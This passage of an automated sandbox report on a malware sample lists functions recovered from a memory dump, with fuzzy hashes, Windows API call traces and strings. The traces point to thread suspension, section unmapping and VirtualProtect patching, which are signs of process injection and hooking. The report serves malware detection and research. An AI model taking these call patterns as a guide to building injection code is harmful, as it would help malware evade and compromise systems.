  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
